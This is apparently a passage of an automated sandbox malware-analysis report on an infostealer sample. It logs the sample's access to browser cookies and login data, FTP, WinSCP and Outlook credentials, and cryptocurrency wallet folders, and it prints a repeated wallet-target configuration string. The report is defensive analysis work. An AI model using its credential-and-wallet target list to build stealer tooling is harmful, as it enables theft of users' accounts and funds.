Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: 1719859269.0326595_setup.exe, 00000000.00000003.2231437346.0000021664602000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2627954517.0000000001E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000011.00000002.2559747282.0000000003335000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2559747282.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lbg6Jgx2PuK0JimgGIFCI5UU.exe PID: 6256, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Mars stealer

Source: Yara match	File source: 9.2.Lbg6Jgx2PuK0JimgGIFCI5UU.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2606301405.0000000000A01000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663cfc420.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d50aa0.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.1719859269.0326595_setup.exe.21663d50aa0.22.unpack, type: UNPACKEDPE
